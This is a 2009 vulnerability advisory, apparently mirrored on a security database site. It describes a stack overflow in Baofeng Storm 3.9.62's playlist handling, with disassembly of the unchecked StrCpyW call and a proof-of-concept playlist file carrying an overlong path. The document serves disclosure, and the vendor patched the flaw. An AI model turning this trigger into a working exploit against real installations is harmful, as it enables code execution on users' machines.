Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22099
HistoryJun 29, 2009 - 12:00 a.m.

Baofeng Media Player playlist stack overflow vulnerability

2009-06-2900:00:00
vulners.com
23
JSON

Baofeng Media Player playlist stack overflow vulnerability

By Jambalaya of Nevis Labs
Date: 2009.06.24

Vender:
Baofeng

Affected:
Storm 3.9.62
*Other version may also be affected

Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.

Details:
The specific flaws exists in medialib.dll. the stack overflow
vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.

the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of pathЈє

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B proc near ; DATA XREF:
.rdata:100248D4o
.text:1000567B
.text:1000567B FileName = word ptr -628h
.text:1000567B var_10 = dword ptr -10h
.text:1000567B var_C = dword ptr -0Ch
.text:1000567B var_4 = dword ptr -4
.text:1000567B pszUrl = dword ptr 8
.text:1000567B pcchPath = dword ptr 0Ch
.text:1000567B
.text:1000567B mov eax, offset sub_100221F8
.text:10005680 call __EH_prolog
.text:10005685 sub esp, 61Ch
.text:1000568B push ebx
.text:1000568C push esi
.text:1000568D mov esi, [ebp+pszUrl]
.text:10005690 mov [ebp+var_10], ecx
.text:10005693 test esi, esi
.text:10005695 jz loc_1000577D
.text:1000569B mov ebx, [ebp+pcchPath]
.text:1000569E test ebx, ebx
.text:100056A0 jz loc_1000577D
.text:100056A6 push edi
.text:100056A7 push esi ; pszPath
.text:100056A8 xor edi, edi
.text:100056AA mov [ebp+pcchPath], 208h
.text:100056B1 call ds:PathIsURLW
.text:100056B7 test eax, eax
.text:100056B9 jz short loc_100056E0
.text:100056BB push 3 ; UrlIs
.text:100056BD push esi ; pszUrl
.text:100056BE call ds:UrlIsW
.text:100056C4 test eax, eax
.text:100056C6 jz short loc_100056E0
.text:100056E0 loc_100056E0: ; CODE XREF:
sub_1000567B+3Ej
.text:100056E0 ; sub_1000567B+4Bj
.text:100056E0 lea eax, [ebp+FileName]
.text:100056E6 push esi
.text:100056E7 push eax
.text:100056E8 call ds:StrCpyW
<---------------------strcpy directly with out any examiation.

Proof of conceptЈє
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\ЧАГж\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\ЧАГж\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
duration="0"/></playlist>

Greetz to those friends who I have long time no see T_TЈєPratik Dixit,
Sanjay
pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version

JSON